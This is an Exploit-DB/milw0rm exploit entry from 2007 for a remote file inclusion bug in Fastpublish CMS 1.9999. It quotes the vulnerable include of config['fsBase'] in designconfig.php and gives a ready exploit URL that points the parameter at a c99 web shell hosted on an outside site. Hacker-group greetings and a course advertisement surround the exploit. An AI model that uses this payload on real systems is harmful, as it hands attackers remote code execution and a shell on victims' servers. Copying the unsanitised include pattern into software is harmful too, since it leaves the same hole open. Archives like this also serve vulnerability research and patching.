Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion

EDB-ID:

4725




Platform:

PHP

Date:

2007-12-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Name : Fastpublish CMS 1.9999 (config[fsBase]) Remote File Include
# Download From : http://www.fastpublish.org/aufbau/php_content/downloadlist.php?action=download&id=53&sprache=en
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In designconfig.php In Line 25 :
@include($config['fsBase']
# Exploit :
www.RxH.com/fastpublish_19999d_trial/adminbereich/designconfig.php?config[fsBase]=http://www.no-hack.fr/shells/c99.txt?

============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-12]